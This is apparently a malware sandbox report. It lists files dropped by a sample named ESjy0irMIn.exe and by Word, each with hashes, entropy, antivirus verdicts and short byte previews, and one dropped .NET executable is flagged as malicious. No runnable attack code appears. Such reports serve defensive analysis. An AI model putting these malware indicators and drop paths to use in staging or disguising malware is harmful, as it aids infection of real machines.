Preview: ..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.
Process: C:\Users\user\Desktop\ESjy0irMIn.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 887896
Entropy (8bit): 7.856084053303004
Encrypted: false
SSDEEP: 24576:atW4x8xgmUdUcyezFSjahBaNOMGC3UgJuTYdIMlM9QVmcIOLfEdjJYV:B4x8x1UGexmbcMGC3U3MlLVmczEdjJY
MD5: 61446FDD76788229D3EBAEABE84DF38C
SHA1: E15AD80FC74277EF2048312E9A71AF56B2EBA622
SHA-256: 6AC187B96CE2C03640CFFF2431A36F705C785A42ABA6DD2566F1117652F067CB
SHA-512: 2C781FF3EEDB81DD9B670D0B50032F3A498D581734F97A3C928D0919ED8AAA12327CE87A8E16F7E11AAD1740A4912109EA4E7B6E9BB39D57A72E165CF561B716
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}...}...}...,...}......}.......}...//..}.../...}.../...}.......}...}...}...,+..}...,/..}...,...}...,...}...,...}..Rich.}..........................PE..L......J.........."..........^...................@..........................@............@...... ..................@.......D........................t..p.......l....................................V..@............................................text.............................. ..`.data....7..........................@....boxld01............................@..@.rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\ESjy0irMIn.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 176128
Entropy (8bit): 6.605034456633344
Encrypted: false
SSDEEP: 3072:IjeYmvQXWnFgmzbxC+rIIf/bbytAtytAbJrx+okj1K1:IjeYmoXoVCRIOtAQtAtrM1
MD5: 7266F0DBCD9D7EE7F4618A70D3CB53EE
SHA1: 1C2EF16D787524C565E7F87A45D881DC5CDB8545
SHA-256: 09B5AF80660CA11FDB9537DC4D156EFCECF4051B81A573D697984D8075E15BC8
SHA-512: 5381AF4121D6648F2DDE0DD2036408714D798328C12C4CD5156619A6A9EC6B0C77C4B3899E395DD4D046FB0AA116ED6A56D8F4BFD0E645AA90DDFA161E1A15C6
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 79%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....?e............................~.... ... ....@.. ....................................@.................................,...O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\ProgramData\essam@sasa2023.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 525
Entropy (8bit): 5.259753436570609
Encrypted: false
SSDEEP: 12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
MD5: 260E01CC001F9C4643CA7A62F395D747
SHA1: 492AD0ACE3A9C8736909866EEA168962D418BE5A
SHA-256: 4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
SHA-512: 01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
Malicious: false
Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..
Process: C:\Users\user\Desktop\ESjy0irMIn.exe
File Type: CSV text
Category: dropped
Size (bytes): 1742
Entropy (8bit): 5.38333519179651
Encrypted: false
SSDEEP: 48:MxHKQwYHKGSI6o6+vxp3/ell1qHGIs0HKCtHTHhAHKKkBAmHKcA9:iqbYqGSI6o9Zp/ellwmj0qCtzHeqKkBY
MD5: 0BE948BBCA74F85B3D2B466D6582C6F4
SHA1: D6BDEC569DD5C748A94668D77109623322A79B9B
SHA-256: A2C775508E39F74CC88A5BC9BE11D42F6A0EED68F7B4271B123F45D9C9E65E51
SHA-512: 23175FBFA21EFC503BDADE9CC7939EFA1E4377EB1CC572C44B37E3BAF673E29AB8F3BC1EF4A720CC7511C98A85A8034AB94DD143DE69826AB2D114EAC2D7CA30
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_6
Process: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type: JSON data
Category: dropped
Size (bytes): 520128
Entropy (8bit): 4.907706947229227
Encrypted: false
SSDEEP: 3072:X2ObOSb3F2Fq9VMjNYof+pmpnGDubTxZO7aYb6f5780K2:JbOq3OjNymtGyT
MD5: FBD616C03BD0BB44DD43D63001DE4891
SHA1: 542B34961A09A535B19EBE3B84B41A0A3930F7F0
SHA-256: C85795698D46699A69EBC9EAE17AE1C26045C6A97C18B60597679E30C97668B9
SHA-512: C92783CFC6CC7CC10A2306FDA2B55E12D572F09E57F1ED656DC959EF79F9862E78011EF5FA771D9828D07CBD82E3FC3ED9B6897A82B36BC26DDF5D88B4D4A9E9
Malicious: false
Preview: {"MajorVersion":4,"MinorVersion":37,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830
Process: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type: TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_37RegularVersion 4.37;O365
Category: dropped
Size (bytes): 767532
Entropy (8bit): 6.5591108505203914
Encrypted: false
SSDEEP: 12288:on84XUdLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/yLQ/zlm1kjFKy6Nyjbqq+:o8XNDs5+ivOXgm1kYvyz2
MD5: 795C53DE9F9FEA90A237A43534CCCAB2
SHA1: E73FDCD5135A1ED4BEDF643CAB0BD73D58A6F4A6
SHA-256: 892C40F31DB579FAAE34F53D9482708E5CEE564BEF5413D140D4FCD1B82C2030
SHA-512: 731988998E96ED7013FBC3B2CA9F7B1D03876F1B68E79C502E983D145A5E8FE58B1FD1780F6455A20EB41E3FC8502E14E021C1E54EFEC503884CBA6227D1B3D4
Malicious: false
Preview: ........... OS/29....(...`cmap.s.(.......pglyf..&?...\....head1..0.......6hheaE.@r.......$hmtxr..........0loca.+.....(...4maxp........... name.V+.........post...<....... ..........*._.<...........<......J.G....Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................l......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..
Process: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BB7DF04E1B0A2570657527A7E108AE23
SHA1: 5188431849B4613152FD7BDBA6A3FF0A4FD6424B
SHA-256: C35020473AED1B4642CD726CAD727B63FFF2824AD68CEDD7FFB73C7CBD890479
SHA-512: 768007E06B0CD9E62D50F458B9435C6DDA0A6D272F0B15550F97C478394B743331C3A9C9236E09AB5B9CB3B423B2320A5D66EB3C7068DB9EA37891CA40E47012
Malicious: false
Preview: (no printable bytes; the file consists of a single repeated byte value, consistent with the 0.0 entropy above)
Process: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 184
Entropy (8bit): 5.226620139633058
Encrypted: false
SSDEEP: 3:Nj5dlv2cv7MCuOt+kiE2J5xAIw3r3P8XlKBuQLlnXdMCuOt+kiE2J5xAIw3r3MGh:N92cvIbOwkn23fM/BukObOwkn23fOes
MD5: EBCF2C7074A9B18E02854918B519851F
SHA1: FE8F39EF5218D69ED91743DE74ADA2E72BAF8D21
SHA-256: BD5B66DD48B5256691A108F1685201C35E43680725B085900E27E9E2E67680E0
SHA-512: A6B255D590E73963268D4B56F4B24AC5415164E8584F60825BA16699CA12943117FBDE0AEF53C40351754F22454A9F0AB82F23D1B16157DD0C4007412ACF9D44
Malicious: false
Preview: S..R.......U.A..-L..........*file:///C:\Users\user\AppData\Local\Temp\..BlockersInfo1..rtf......U....5L..........*file:///C:\Users\user\AppData\Local\Temp\..BlockersInfo2..rtf.....

Process: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 162919
Entropy (8bit): 5.344229935374897
Encrypted: false
SSDEEP: 1536:Z+C7FPgOGB3U9guw1JQ9DQA+zez0Q5k4F77nXmvid8XRTEwr/j6B:GLQ9DQA+zezQXef
MD5: AF54A72AA45899B25403FFE213B26C88
SHA1: F84176C0DD169F4125CF32B46ABA378A8151B03C
SHA-256: 4C388800950B4A5278E05B19F9FC303A23CA96517C937EE6171514DF3E6268A5
SHA-512: 5EDBB09521C37B26FD21131A47A51930830FDDD8F6960DFEBB052EA75137F1294C8B253736964F6FF522CCEEC8D4613633AFAB58ED22FAF01FB5B577158B91C1
Malicious: false
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-11-03T17:52:49">.. Build: 16.0.17028.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU

Process: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 162919
Entropy (8bit): 5.344230639945321
Encrypted: false
SSDEEP: 1536:j+C7FPgOGB3U9guw1JQ9DQA+zez0Q5k4F77nXmvid8XRTEwr/j6B:QLQ9DQA+zezQXef
MD5: 13CADA6A7306D5BCF7677854C7833AB6
SHA1: CF3E57A3501D060E23287DDC0BB6BAA238AD0B65
SHA-256: FAEB3DE9AECD8E64AFE1AF4EC8D946564937BD35F5B04600B905260BC93F7DD2
SHA-512: 970390D73D977512D84D37339FDB49655B5CD60EB5C8482EC1E737D796CC2B6462B7489165DDBDE24C9553AE37A9C6E50E59C62E8F209C8A4B9E98F8686E75B0
Malicious: false
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-11-03T17:52:47">.. Build: 16.0.17028.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU

Process: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type: SQLite 3.x database, last written using SQLite version 3023002, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
Category: dropped
Size (bytes): 4096
Entropy (8bit): 0.09216609452072291
Encrypted: false
SSDEEP: 3:lSWFN3l/klslpF/4llfll:l9F8E0/
MD5: F138A66469C10D5761C6CBB36F2163C3
SHA1: EEA136206474280549586923B7A4A3C6D5DB1E25
SHA-256: C712D6C7A60F170A0C6C5EC768D962C58B1F59A2D417E98C7C528A037C427AB6
SHA-512: 9D25F943B6137DD2981EE75D57BAF3A9E0EE27EEA2DF19591D580F02EC8520D837B8E419A8B1EB7197614A3C6D8793C56EBC848C38295ADA23C31273DAA302D9
Malicious: false

Process: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type: SQLite Rollback Journal
Category: dropped
Size (bytes): 4616
Entropy (8bit): 0.13700485453793962
Encrypted: false
SSDEEP: 3:7FEG2l+qfls/l/FllkpMRgSWbNFl/sl+ltlslVlllfllqfn:7+/lnflsvg9bNFlEs1EP/6fn
MD5: 40140C96AB634D228E71BA00622EA7EB
SHA1: 974C1A2559D22BDCF554672D4C2DB2E3FF6D2408
SHA-256: A71B42BD0CE72FBDB61F208ABEFA3A5B9379B19110113897CAC267B74135BFEF
SHA-512: E1D9B31B5676EFDA48497AA6217D01603ECB84E2B87BB7A116E838F0E44B1C0C0FA74F6873CF42E5873B00981FF8D6D77D791C57995C24AA03876755A0567376
Malicious: false

Process: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.04467274160378143
Encrypted: false
SSDEEP: 3:GolYtjlb0kTDW0ElYtjlb0kTDW0m1R9//Xlvlll1lllwlvlllglbelDbllAlldla:G4SS1SSf9XXPH4l942wU
MD5: B668C7BFC0CADCF9323ECED4D056229E
SHA1: 1895DC5B8382BEEC19FD550C8B6D116BCACE1E39
SHA-256: 074A82295254CFD7FEB09A5B667E4421AA308CD40F13AC36C8FF3ADF1D642B06
SHA-512: 56C15ED50169E9B004851A87A1FCA8C2E09577944AF62B16C30CEC4298B9D5F09274780D14C4380CC5194CEBC8E103390A96782A20A1B491FE50F796C189683E
Malicious: false

Process: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type: SQLite Write-Ahead Log, version 3007000
Category: modified
Size (bytes): 49472
Entropy (8bit): 0.48337097378035226
Encrypted: false
SSDEEP: 24:Ki1Q3zRDFUll7DBtDi4kZERDazqt8VtbDBtDi4kZERDM4lDqt8VtbDBtDi4kZERL:P1Q15Ull7DYMuzO8VFDYMY+DO8VFDYML
MD5: A1D92B632C5CBCDB63DCB2736B8FA1A4
SHA1: 193A051FD134C9A0B5853262CEC97B901816335C
SHA-256: 1AA63AB53883DD453E016ACDBF6267D1FB4429C4D6FC812F4B5A5B297E2BE847
SHA-512: 88153B11ADE63AB57C8886BA337DC50AE6E78B0137B9665C6535295B4E3DC251B80A358AF08AF6C33D0D379F7C273CADD383EAD0E836CCAD2809A1A991D72CEF
Malicious: false

Process: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 2278
Entropy (8bit): 3.8233459067051103
Encrypted: false
SSDEEP: 48:uiTrlKxsxxUxl9Il8uCVeRyYAwIIeLdfu/d1rc:vIYAeEYFIIeLdfj
MD5: 8167C6E99EA19C0F0E347DC61FA6FD16
SHA1: 5C4ABCE5EFA3DDB89FB487BA9D98FBAE7EB39F39
SHA-256: BB45A40FE970EC2F9A45413CBB760281C9429E609D8704B48E5E5B5530274E23
SHA-512: AED96DB9D8787AA96524140EE4C4B2DE47241ACAF5243E7F2F6CAFA83FACABE4B27328EBFF877AF611AAACD39B6FF5FA0A2F2BDA979EB6C8F00F248CF326001C
Malicious: false
Preview (UTF-16 text, decoded, truncated): {"TBDataStoreObject":{"Header":{"ObjectType":"TokenResponse","SchemaVersionMajor":2,"SchemaVersionMinor":1},"ObjectData":{"SystemDefinedProperties":{"RequestIndex":{"Type":"InlineBytes","IsProtected":false,"Value":"CJ1mugSozsS9xSZ/QvOc+EJ4u2c="},"Expiration":{"Type":"InlineBytes","IsProtected":false,"Value":"gKmn74YO2gE="},"Status":{"Type":"InlineBytes","IsProtected":false,"Value":"AAAAAA=="},"ResponseBytes":{"Type":"InlineBytes","IsProtected":true,"Value":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAA7HAbPx

Process: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 4542
Entropy (8bit): 3.9973278279221445
Encrypted: false
SSDEEP: 96:MYQtfRpgMD6ICtGbMC4MTqMlAGJGf3BNVnd4s:MtVRpgMD6yMCReMlWNVdR
MD5: 1090E5FDFBF82CA5A8FB267148EDF9CE
SHA1: 3F736B2659320D995CC5FFADB3B93E2181DD6FA4
SHA-256: 81F4F74F357028454DA09A1F567A0732007C48327B8D13A638B7B5C63D991952
SHA-512: 2D6ED0E72479A79447AAF60A6F2E0C50AEA8B12FF3A5279F60A85DC9D55E111EE2208BA734AB8A827CB1AD47C9A7F2292B74F149D790F0ED2C20DF72AC0265DF
Malicious: false
Preview (UTF-16 text, decoded, truncated): {"TBDataStoreObject":{"Header":{"ObjectType":"TokenResponse","SchemaVersionMajor":2,"SchemaVersionMinor":1},"ObjectData":{"SystemDefinedProperties":{"RequestIndex":{"Type":"InlineBytes","IsProtected":false,"Value":"VqYa63XY9b4YbCZgf0uyE6vnxew="},"Expiration":{"Type":"InlineBytes","IsProtected":false,"Value":"BAqk1X4O2gE="},"Status":{"Type":"InlineBytes","IsProtected":false,"Value":"AwAAAA=="},"ResponseBytes":{"Type":"InlineBytes","IsProtected":true,"Value":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAA7HAbPx

Process: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1536
Entropy (8bit): 1.3043886928434667
Encrypted: false
SSDEEP: 6:mEMEEEul39lCgK1qViAC4lA1iAPldpwEcJEhqEX:c3YPf48txBVX
MD5: B3768CEF11C3C6D62430AEF24A79420D
SHA1: 4FA4277B918631D87921AAA565FA616EBFE00534
SHA-256: 279922D2055D098C0FDDAA4200669C7F06C974997E45654B3F02A170D942BAE7
SHA-512: 29F8E45D080DD45E55963409CACF9A431AE6CC76A2A9AC0C2E303A51C0C1F1BE15E7C88061803862A2192A00A00E86DC92E10567BEB2F5E0AF10424161BAEDFB
Malicious: false
                                                                                                                                                                  Preview:....1.2.....1.2.....1.....1.....1.2.....1.2.....1.2.....1.2.....(.....(.....(.....(.....(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...&...(.......0...6...8...>...@...D...F...J...L...P...R...V...X...............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1536
                                                                                                                                                                  Entropy (8bit):1.3030575809016531
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:ml+lGl+l+l+l1PPPXll1l7lhlJvl5hzldlxpxl/b1l/pl/Ppl/NllXljl/tl/rl9:mEMEEEul39lCgK1qVQvFq61kcL6+COX
                                                                                                                                                                  MD5:5535CF97B6419116D9017B00204F79A0
                                                                                                                                                                  SHA1:173D163896E6929D5488490EDEBC0E23F100CADA
                                                                                                                                                                  SHA-256:8294FB1217A148A60575F20B88D0172962A4D33D6C0D0DC7B35C42FEFA64649C
                                                                                                                                                                  SHA-512:566131C4421C06758D888C23B9ED589B933DED347FDCE4510A390EF67306B6664FA4F5A7F9FFD1FD4687E199897AD824BC41425274FB337C8D309B2791273CC1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:....1.2.....1.2.....1.....1.....1.2.....1.2.....1.2.....1.2.....(.....(.....(.....(.....(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...&...(.......0...6...8...>...@...D...F...J...L...P...R...V...X...............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2190
                                                                                                                                                                  Entropy (8bit):2.337646512799098
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:EsqvOGLPYhLmW0VMFqVGRXOruJuNfb6q4LTsqFd:XqmG7YhyWUGerugNzXiTjd
                                                                                                                                                                  MD5:CF995F89C2083BA07E18D59DF7F78DCF
                                                                                                                                                                  SHA1:A6C7AD586B1AF9ED41CA39073F0C50DD021E79DC
                                                                                                                                                                  SHA-256:CCB4ED10900D02FAC8BCF795ED7AE7D678408F25B3F12442D31ECD41E0208B9F
                                                                                                                                                                  SHA-512:43453B351A9639AA37F8C3CFFB82CBE1C3CCE4191F66E55F9262C55467FE398FFCAC4EABC0A1F9325A5F9C25D1B5B23AFC215B808AC7B661F7A5B86D8489AA45
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:D.e.t.a.i.l.s.....1....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................<..CJ..KH..OJ+.QJ+.^J+.aJ...CJ..KH..OJ+.QJ+.^J+.aJ...!5..>*.CJ..K
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2190
                                                                                                                                                                  Entropy (8bit):2.337646512799098
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:EsqvOGLPYhLmW0VMFqVGRXOruJuNfb6q4LTsqFd:XqmG7YhyWUGerugNzXiTjd
                                                                                                                                                                  MD5:CF995F89C2083BA07E18D59DF7F78DCF
                                                                                                                                                                  SHA1:A6C7AD586B1AF9ED41CA39073F0C50DD021E79DC
                                                                                                                                                                  SHA-256:CCB4ED10900D02FAC8BCF795ED7AE7D678408F25B3F12442D31ECD41E0208B9F
                                                                                                                                                                  SHA-512:43453B351A9639AA37F8C3CFFB82CBE1C3CCE4191F66E55F9262C55467FE398FFCAC4EABC0A1F9325A5F9C25D1B5B23AFC215B808AC7B661F7A5B86D8489AA45
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:D.e.t.a.i.l.s.....1....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................<..CJ..KH..OJ+.QJ+.^J+.aJ...CJ..KH..OJ+.QJ+.^J+.aJ...!5..>*.CJ..K
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20971520
                                                                                                                                                                  Entropy (8bit):0.004031818010834895
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:vozICxK+wQ8dum7KOwKT1vKVbQ8dDJhbMKFyQ8d+5slHKiUQ8dub9Er4QEKrBvQq:RaKTEhmtgr43AMhiB3
                                                                                                                                                                  MD5:E5DC2CD5F223535B96B6D4F713856B08
                                                                                                                                                                  SHA1:277B95FB3F9D3D08D06588186AA5D5E264EADCC5
                                                                                                                                                                  SHA-256:BD7B77D57D6D7A2D7CAE0AE5FFC1266FED3B98F6C4B6794147F33F4E1AA63495
                                                                                                                                                                  SHA-512:0EB2383680991DD06589B0A36EB593FA22CA9B27B1F5CED31711297250A34C36D37DB4603D5D0FC0728AF61054A69195A0575109BA4E0CEE5AEAE146252E1CA5
                                                                                                                                                                  Malicious:false
